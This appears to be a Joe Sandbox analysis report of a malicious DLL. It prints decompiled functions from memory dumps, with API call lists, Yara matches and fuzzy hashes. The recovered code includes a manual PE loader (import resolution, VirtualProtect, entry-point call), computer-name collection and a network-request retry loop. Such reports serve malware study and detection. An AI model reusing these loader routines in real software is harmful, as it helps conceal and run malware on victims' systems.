                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			// Runs E10001540 with the calling thread pinned to the first CPU and lowered in priority,
                                			// restoring the priority only on success. The affinity mask is not restored.
                                			E10001CE7(void* __ecx, char _a4) {
                                				long _t3;
                                				int _t4;
                                				int _t9;
                                				void* _t13;
                                
                                				_t13 = GetCurrentThread();
                                				_t3 = SetThreadAffinityMask(_t13, 1); // executed; mask 1 = CPU 0 only
                                				if(_t3 != 0) {
                                					SetThreadPriority(_t13, 0xffffffff); // executed; -1 = THREAD_PRIORITY_BELOW_NORMAL
                                				}
                                				_t4 = E10001540(_a4); // executed
                                				_t9 = _t4;
                                				if(_t9 == 0) {
                                					SetThreadPriority(_t13, _t4); // _t4 == 0 here: back to THREAD_PRIORITY_NORMAL
                                				}
                                				asm("lock xadd [eax], ecx"); // atomic add to a shared counter (operands not recovered by the decompiler)
                                				return _t9;
                                			}

                                Statement addresses (one entry per decompiled statement, in order): 0x10001cf0 0x10001cf5 0x10001d03 0x10001d08 0x10001d08 0x10001d0e 0x10001d13 0x10001d17 0x10001d1b 0x10001d1b 0x10001d25 0x10001d2e

                                APIs
                                • GetCurrentThread.KERNEL32 ref: 10001CEA
                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 10001CF5
                                • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 10001D08
                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 10001D1B
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Thread$Priority$AffinityCurrentMask
                                • String ID:
                                • API String ID: 1452675757-0
                                • Opcode ID: d56f78b7c5b401a37c28ed4cd59cf0cc51a118dddb6064f75b73a294fd21ba0e
                                • Instruction ID: e4b3be2930a2d30c1a8d1367e94e89244ea36a12442c579d3d569057e20ce27f
                                • Opcode Fuzzy Hash: d56f78b7c5b401a37c28ed4cd59cf0cc51a118dddb6064f75b73a294fd21ba0e
                                • Instruction Fuzzy Hash: 9BE092313076216BF2126B294CC4EAB679CEF913F17124226F621922E4DF548C0189A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 47%
                                			// Splits the command string _a4 into an argv-style array of char* on spaces and stores the
                                			// array pointer in *_a8. Tokens are terminated in place, so the array points into _a4.
                                			// No token count and no terminating NULL entry are written here, and 0 is returned even
                                			// when the allocation fails (in which case *_a8 is left untouched).
                                			E00D44A2A(char* _a4, char** _a8) {
                                				char* _t7;
                                				char* _t11;
                                				char* _t14;
                                				char* _t16;
                                				char* _t17;
                                				char _t18;
                                				signed int _t20;
                                				signed int _t22;
                                
                                				_t16 = _a4;
                                				_push(0x20);
                                				_t20 = 1; // upper bound on tokens: 1 + number of spaces
                                				_push(_t16);
                                				while(1) {
                                					_t7 = StrChrA(); // count the spaces
                                					if(_t7 == 0) {
                                						break;
                                					}
                                					_t20 = _t20 + 1;
                                					_push(0x20);
                                					_push( &(_t7[1]));
                                				}
                                				_t11 = E00D41525(_t20 << 2); // heap-allocate _t20 pointers (4 bytes each)
                                				_a4 = _t11;
                                				if(_t11 != 0) {
                                					StrTrimA(_t16, 0xd4c284); // executed; strip the characters listed in the string at 0xd4c284 from both ends
                                					_t22 = 0;
                                					do {
                                						_t14 = StrChrA(_t16, 0x20);
                                						if(_t14 != 0) {
                                							 *_t14 = 0; // terminate the current token in place
                                							do {
                                								_t14 =  &(_t14[1]);
                                								_t18 =  *_t14;
                                							} while (_t18 == 0x20 || _t18 == 9); // skip a run of spaces/tabs to the next token
                                						}
                                						_t17 = _a4;
                                						 *(_t17 + _t22 * 4) = _t16; // argv[_t22] = token
                                						_t22 = _t22 + 1;
                                						_t16 = _t14;
                                					} while (_t14 != 0);
                                					 *_a8 = _t17; // hand the array back
                                				}
                                				return 0;
                                			}

                                Statement addresses (one entry per decompiled statement, in order; 0x00000000 marks a statement without its own address): 0x00d44a2e 0x00d44a3b 0x00d44a3d 0x00d44a3e 0x00d44a46 0x00d44a46 0x00d44a4a 0x00000000 0x00000000 0x00d44a41 0x00d44a42 0x00d44a45 0x00d44a45 0x00d44a52 0x00d44a57 0x00d44a5c 0x00d44a64 0x00d44a6a 0x00d44a6c 0x00d44a6f 0x00d44a73 0x00d44a75 0x00d44a78 0x00d44a78 0x00d44a79 0x00d44a7b 0x00d44a78 0x00d44a85 0x00d44a88 0x00d44a8b 0x00d44a8c 0x00d44a8e 0x00d44a95 0x00d44a95 0x00d44aa1

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,032895AC,00D430F3,?,00D41173,?,032895AC,?,00D430F3), ref: 00D44A46
                                • StrTrimA.SHLWAPI(?,00D4C284,00000002,?,00D41173,?,032895AC,?,00D430F3), ref: 00D44A64
                                • StrChrA.SHLWAPI(?,00000020,?,00D41173,?,032895AC,?,00D430F3), ref: 00D44A6F
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: c495d9c65593111af8b77b6e4842dbc7902bb0ffe57968b0b3fc5692694864ee
                                • Instruction ID: ea48d51cfa330882fdcaab16272ed7249b89fb37741691c9e22050a3aab40bbb
                                • Opcode Fuzzy Hash: c495d9c65593111af8b77b6e4842dbc7902bb0ffe57968b0b3fc5692694864ee
                                • Instruction Fuzzy Hash: 1501A2723803066FE7204E6A8C4AF6B7F9DEBC5758F189011B985CB292DA70CC82C774
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			// Heap-free wrapper around the heap handle cached at 0xd4d238.
                                			E00D48B22(void* _a4) {
                                				char _t2;
                                
                                				_t2 = RtlFreeHeap( *0xd4d238, 0, _a4); // executed; flags 0
                                				return _t2;
                                			}

                                Statement addresses (one entry per decompiled statement, in order): 0x00d48b2e 0x00d48b34

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: a7a3a0d716b5dd59436ea2e2405312eebbb9b875aaf8288a9f3d2aa460666cc8
                                • Instruction ID: 8afacc947ef5d6a9df795bbe59a216ee04b0f893f1bc73430b26a25e0ad1d3dc
                                • Opcode Fuzzy Hash: a7a3a0d716b5dd59436ea2e2405312eebbb9b875aaf8288a9f3d2aa460666cc8
                                • Instruction Fuzzy Hash: F9B01279100300EBCB114F50DE04F05FA22AB51700F004010F3048817487724420FB39
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E00D476E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                				void* _v8;
                                				void* __esi;
                                				intOrPtr* _t35;
                                				void* _t40;
                                				intOrPtr* _t41;
                                				intOrPtr* _t43;
                                				intOrPtr* _t45;
                                				intOrPtr* _t50;
                                				intOrPtr* _t52;
                                				void* _t54;
                                				intOrPtr* _t55;
                                				intOrPtr* _t57;
                                				intOrPtr* _t61;
                                				intOrPtr* _t65;
                                				intOrPtr _t68;
                                				void* _t72;
                                				void* _t75;
                                				void* _t76;
                                
                                				_t55 = _a4;
                                				_t35 =  *((intOrPtr*)(_t55 + 4));
                                				_a4 = 0;
                                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                				if(_t76 < 0) {
                                					L18:
                                					return _t76;
                                				}
                                				_t40 = E00D48A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                				_t76 = _t40;
                                				if(_t76 >= 0) {
                                					_t61 = _a28;
                                					if(_t61 != 0 &&  *_t61 != 0) {
                                						_t52 = _v8;
                                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                					}
                                					if(_t76 >= 0) {
                                						_t43 =  *_t55;
                                						_t68 =  *0xd4d2a8; // 0x253a5a8
                                						_t20 = _t68 + 0xd4e1fc; // 0x740053
                                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                						if(_t76 >= 0) {
                                							_t76 = E00D4A6BC(_a4);
                                							if(_t76 >= 0) {
                                								_t65 = _a28;
                                								if(_t65 != 0 &&  *_t65 == 0) {
                                									_t50 = _a4;
                                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                								}
                                							}
                                						}
                                						_t45 = _a4;
                                						if(_t45 != 0) {
                                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                						}
                                						_t57 = __imp__#6;
                                						if(_a20 != 0) {
                                							 *_t57(_a20);
                                						}
                                						if(_a12 != 0) {
                                							 *_t57(_a12);
                                						}
                                					}
                                				}
                                				_t41 = _v8;
                                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                				goto L18;
                                			}

                                APIs
                                  • Part of subcall function 00D48A19: SysAllocString.OLEAUT32(80000002), ref: 00D48A76
                                  • Part of subcall function 00D48A19: SysFreeString.OLEAUT32(00000000), ref: 00D48ADC
                                • SysFreeString.OLEAUT32(?), ref: 00D477C6
                                • SysFreeString.OLEAUT32(00D44BD8), ref: 00D477D0
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 7092e7ac2725821d11f00c11c6ee795dbcc056099171288f4ed35890781a9646
                                • Instruction ID: 95c9b1537adf7fab3bac018ec2e758e4a9b71378c5b2560508291717e0c3389b
                                • Opcode Fuzzy Hash: 7092e7ac2725821d11f00c11c6ee795dbcc056099171288f4ed35890781a9646
                                • Instruction Fuzzy Hash: A7312876900159AFCB11DF98C888C9BBB7AFFC97407544658F9159B220E731DD52CBB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 86%
                                			E100010F9(void* __eax) {
                                				char _v8;
                                				void* _v12;
                                				void* __edi;
                                				void* _t18;
                                				long _t24;
                                				long _t26;
                                				long _t29;
                                				intOrPtr _t40;
                                				void* _t41;
                                				intOrPtr* _t42;
                                				void* _t44;
                                
                                				_t41 = __eax;
                                				_t16 =  *0x10004140;
                                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x69b24f45 &  !( *0x10004140 - 0x69b24f45);
                                				_t18 = E10001015( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x69b24f45 &  !( *0x10004140 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x69b24f45 &  !( *0x10004140 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                				if(_t18 != 0) {
                                					_t29 = 8;
                                					goto L8;
                                				} else {
                                					_t40 = _v8;
                                					_t29 = E10001484(_t33, _t40, _t41);
                                					if(_t29 == 0) {
                                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                						_t24 = E10001753(_t40, _t44); // executed
                                						_t29 = _t24;
                                						if(_t29 == 0) {
                                							_t26 = E10001D31(_t44, _t40); // executed
                                							_t29 = _t26;
                                							if(_t29 == 0) {
                                								_push(_t26);
                                								_push(1);
                                								_push(_t40);
                                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                									_t29 = GetLastError();
                                								}
                                							}
                                						}
                                					}
                                					_t42 = _v12;
                                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                					E1000167E(_t42);
                                					L8:
                                					return _t29;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 10001015: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001135,?,?,?,?,?,00000002,?,?), ref: 10001039
                                  • Part of subcall function 10001015: GetProcAddress.KERNEL32(00000000,?), ref: 1000105B
                                  • Part of subcall function 10001015: GetProcAddress.KERNEL32(00000000,?), ref: 10001071
                                  • Part of subcall function 10001015: GetProcAddress.KERNEL32(00000000,?), ref: 10001087
                                  • Part of subcall function 10001015: GetProcAddress.KERNEL32(00000000,?), ref: 1000109D
                                  • Part of subcall function 10001015: GetProcAddress.KERNEL32(00000000,?), ref: 100010B3
                                  • Part of subcall function 10001484: memcpy.NTDLL(00000002,?,10001143,?,?,?,?,?,10001143,?,?,?,?,?,?,?), ref: 100014BB
                                  • Part of subcall function 10001484: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 100014F0
                                  • Part of subcall function 10001753: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 1000178B
                                  • Part of subcall function 10001D31: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 10001D6A
                                  • Part of subcall function 10001D31: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001DDF
                                  • Part of subcall function 10001D31: GetLastError.KERNEL32 ref: 10001DE5
                                • GetLastError.KERNEL32(?,?), ref: 10001177
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                • String ID: @Mt MtTt
                                • API String ID: 2673762927-608512568
                                • Opcode ID: 73f9826342b69bd95c16f9403d7a08d6d88bac57bc6fdfaa1a329a52a4a569d4
                                • Instruction ID: 925ad0b34c57d5628c26617c6f539520a1d0920d3ea155fe0462e5882d104542
                                • Opcode Fuzzy Hash: 73f9826342b69bd95c16f9403d7a08d6d88bac57bc6fdfaa1a329a52a4a569d4
                                • Instruction Fuzzy Hash: 2C11083A600712ABE311EBA58C80DDF77FDEF882D47050569EB0597649DEA0FD068790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E1000169A() {
                                				char _v16;
                                				intOrPtr _v28;
                                				void _v32;
                                				void* _v36;
                                				intOrPtr _t15;
                                				void* _t16;
                                				long _t25;
                                				int _t26;
                                				void* _t30;
                                				intOrPtr* _t32;
                                				signed int _t36;
                                				intOrPtr _t39;
                                
                                				_t15 =  *0x10004144;
                                				if( *0x1000412c > 5) {
                                					_t16 = _t15 + 0x100050f9;
                                				} else {
                                					_t16 = _t15 + 0x100050b1;
                                				}
                                				E1000196B(_t16, _t16);
                                				_t36 = 6;
                                				memset( &_v32, 0, _t36 << 2);
                                				if(E100012DC( &_v32,  &_v16,  *0x10004140 ^ 0xf7a71548) == 0) {
                                					_t25 = 0xb;
                                				} else {
                                					_t26 = lstrlenW( *0x10004138);
                                					_t8 = _t26 + 2; // 0x2
                                					_t11 = _t26 + _t8 + 8; // 0xa
                                					_t30 = E10001E13(_t39, _t11,  &_v32,  &_v36); // executed
                                					if(_t30 == 0) {
                                						_t32 = _v36;
                                						 *_t32 = 0;
                                						if( *0x10004138 == 0) {
                                							 *((short*)(_t32 + 4)) = 0;
                                						} else {
                                							E10002070(_t44, _t32 + 4);
                                						}
                                					}
                                					_t25 = E100010F9(_v28); // executed
                                				}
                                				ExitThread(_t25);
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitThreadlstrlen
                                • String ID:
                                • API String ID: 2636182767-0
                                • Opcode ID: b086c4572dfb4f5fc2dc602d0704e7ace3872482ced9345b5dfcc4d97a26dae3
                                • Instruction ID: 0cf49a4b4e23d9d9ae1aa408ad671cdcffb1bf156085d6e57ed5d2e430731b0c
                                • Opcode Fuzzy Hash: b086c4572dfb4f5fc2dc602d0704e7ace3872482ced9345b5dfcc4d97a26dae3
                                • Instruction Fuzzy Hash: 09116DB1508305ABF721DBA4CC99ECB77ECEB043C1F024926F555D3169EB30E6448B55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D45D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                				void* _t21;
                                				void* _t22;
                                				signed int _t24;
                                				intOrPtr* _t26;
                                				void* _t27;
                                
                                				_t26 = __edi;
                                				if(_a4 == 0) {
                                					L2:
                                					_t27 = E00D47DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                					if(_t27 == 0) {
                                						_t24 = _a12 >> 1;
                                						if(_t24 == 0) {
                                							_t27 = 2;
                                							HeapFree( *0xd4d238, 0, _a4);
                                						} else {
                                							_t21 = _a4;
                                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                							 *_t26 = _t21;
                                						}
                                					}
                                					L6:
                                					return _t27;
                                				}
                                				_t22 = E00D41037(_a4, _a8, _a12, __edi); // executed
                                				_t27 = _t22;
                                				if(_t27 == 0) {
                                					goto L6;
                                				}
                                				goto L2;
                                			}

                                APIs
                                  • Part of subcall function 00D41037: SysFreeString.OLEAUT32(00000000), ref: 00D4109A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,00D45356,?,004F0053,03289368,00000000,?), ref: 00D45DDC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID: Ut
                                • API String ID: 3806048269-8415677
                                • Opcode ID: d7aaa7310d03279ffddc9afa272d2aaeabc171812c532ed77524b3fd6cad86ed
                                • Instruction ID: 1a4fe3ee9409eccf8ceb5f9a3d13dacd67440f72951fff67f9a2d13bc6985a59
                                • Opcode Fuzzy Hash: d7aaa7310d03279ffddc9afa272d2aaeabc171812c532ed77524b3fd6cad86ed
                                • Instruction Fuzzy Hash: 13014B32500A19BBCB229F54DC05FEE7B65EF04790F188025FE099A225D731C960DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00D4831C(void* __ecx) {
                                				signed int _v8;
                                				void* _t15;
                                				void* _t19;
                                				void* _t20;
                                				void* _t22;
                                				intOrPtr* _t23;
                                
                                				_t23 = __imp__;
                                				_t20 = 0;
                                				_v8 = _v8 & 0;
                                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                				_t10 = _v8;
                                				if(_v8 != 0) {
                                					_t20 = E00D41525(_t10 + 1);
                                					if(_t20 != 0) {
                                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                						if(_t15 != 0) {
                                							 *((char*)(_v8 + _t20)) = 0;
                                						} else {
                                							E00D48B22(_t20);
                                							_t20 = 0;
                                						}
                                					}
                                				}
                                				return _t20;
                                			}

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,00D49C7E,74E5F710,00000000,?,?,00D49C7E), ref: 00D48334
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • GetComputerNameExA.KERNEL32(00000003,00000000,00D49C7E,00D49C7F,?,?,00D49C7E), ref: 00D48351
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: d649dcbaca7dd2701025076dca4249afb896f847c642f986f9726b59540e431c
                                • Instruction ID: 6f932029dddacdfa3c6e845a186afd0c7676fbb41df432c9489ac56d824ad678
                                • Opcode Fuzzy Hash: d649dcbaca7dd2701025076dca4249afb896f847c642f986f9726b59540e431c
                                • Instruction Fuzzy Hash: 2BF05466600205BFEB21DA9E8C05EAF76FCEBC5B90F190055B505E3140EE70DE01A770
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _t4;
                                				void* _t10;
                                				void* _t11;
                                				void* _t12;
                                				void* _t14;
                                
                                				_t14 = 1;
                                				_t4 = _a8;
                                				if(_t4 == 0) {
                                					if(InterlockedDecrement(0xd4d23c) == 0) {
                                						E00D44DB1();
                                					}
                                				} else {
                                					if(_t4 == 1 && InterlockedIncrement(0xd4d23c) == 1) {
                                						_t10 = E00D42789(_t11, _t12, _a4); // executed
                                						if(_t10 != 0) {
                                							_t14 = 0;
                                						}
                                					}
                                				}
                                				return _t14;
                                			}

                                APIs
                                • InterlockedIncrement.KERNEL32(00D4D23C), ref: 00D47F12
                                  • Part of subcall function 00D42789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,00D47F25,?), ref: 00D4279C
                                • InterlockedDecrement.KERNEL32(00D4D23C), ref: 00D47F32
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: d4465f6c86d3ec5d97159493f85987581c3989c520e4b0d43ffd5c3de3e90b3a
                                • Instruction ID: 3849e501258935b6990243139d58eb0f4d152e337d83831204fc69bb4a87bb1e
                                • Opcode Fuzzy Hash: d4465f6c86d3ec5d97159493f85987581c3989c520e4b0d43ffd5c3de3e90b3a
                                • Instruction Fuzzy Hash: 73E08C3130C232978B216BB49C89B6EA640AF21B81F09A454F8C2E11A4DB51CC5892F1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D4933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                				intOrPtr _v12;
                                				signed int _v20;
                                				intOrPtr _v24;
                                				signed int _v60;
                                				char _v68;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				intOrPtr _t14;
                                				signed int* _t16;
                                				signed int _t25;
                                				signed int _t26;
                                				signed int* _t28;
                                				signed int _t30;
                                
                                				_t28 = __ecx;
                                				_t14 =  *0xd4d2c8; // 0x3289618
                                				_v12 = _t14;
                                				_t16 = _a12;
                                				_t30 = 8;
                                				if(_t16 != 0) {
                                					 *_t16 =  *_t16 & 0x00000000;
                                				}
                                				do {
                                					_t31 =  &_v68;
                                					if(E00D48C01( &_v68) == 0) {
                                						goto L16;
                                					}
                                					_t30 = E00D497F7(_t31, _a4, _v12);
                                					if(_t30 == 0) {
                                						_t25 = E00D45988(_t31, _t28); // executed
                                						_t30 = _t25;
                                						if(_t30 != 0) {
                                							if(_t30 == 0x102) {
                                								E00D4D000 = E00D4D000 + 0xea60;
                                							}
                                						} else {
                                							if(_v24 != 0xc8) {
                                								_t30 = 0xe8;
                                							} else {
                                								_t26 = _v20;
                                								if(_t26 == 0) {
                                									_t30 = 0x10d2;
                                								} else {
                                									_t28 = _a8;
                                									if(_t28 != 0) {
                                										_v60 = _v60 & _t30;
                                										 *_t28 = _v60;
                                										_t28 = _a12;
                                										if(_t28 != 0) {
                                											 *_t28 = _t26;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                					E00D458DB( &_v68, 0x102, _t28, _t30);
                                					L16:
                                				} while (_t30 == 0x2f19 && WaitForSingleObject( *0xd4d26c, 0) == 0x102);
                                				return _t30;
                                			}

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 00D493EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: 7383cec8961d4e57d5ad3755020e4eee37db8442ceff49592bac02f8fb1c8891
                                • Instruction ID: fee85882891b7b92a57eef2d9f2cdeafb6e412e9c0412792e8a215de9609b5df
                                • Opcode Fuzzy Hash: 7383cec8961d4e57d5ad3755020e4eee37db8442ceff49592bac02f8fb1c8891
                                • Instruction Fuzzy Hash: 5C215E367002899BDF11DF5AD8A8A6FB7A6AB82364F194125E501E72D0DBB1DC41CB70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 34%
                                			E00D41037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                				intOrPtr _v12;
                                				void* _v18;
                                				char _v20;
                                				intOrPtr _t15;
                                				void* _t17;
                                				intOrPtr _t19;
                                				void* _t23;
                                
                                				_v20 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				_t15 =  *0xd4d2a8; // 0x253a5a8
                                				_t4 = _t15 + 0xd4e39c; // 0x3288944
                                				_t20 = _t4;
                                				_t6 = _t15 + 0xd4e124; // 0x650047
                                				_t17 = E00D476E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                				if(_t17 < 0) {
                                					_t23 = _t17;
                                				} else {
                                					_t23 = 8;
                                					if(_v20 != _t23) {
                                						_t23 = 1;
                                					} else {
                                						_t19 = E00D47EA4(_t20, _v12);
                                						if(_t19 != 0) {
                                							 *_a16 = _t19;
                                							_t23 = 0;
                                						}
                                						__imp__#6(_v12);
                                					}
                                				}
                                				return _t23;
                                			}

                                APIs
                                  • Part of subcall function 00D476E7: SysFreeString.OLEAUT32(?), ref: 00D477C6
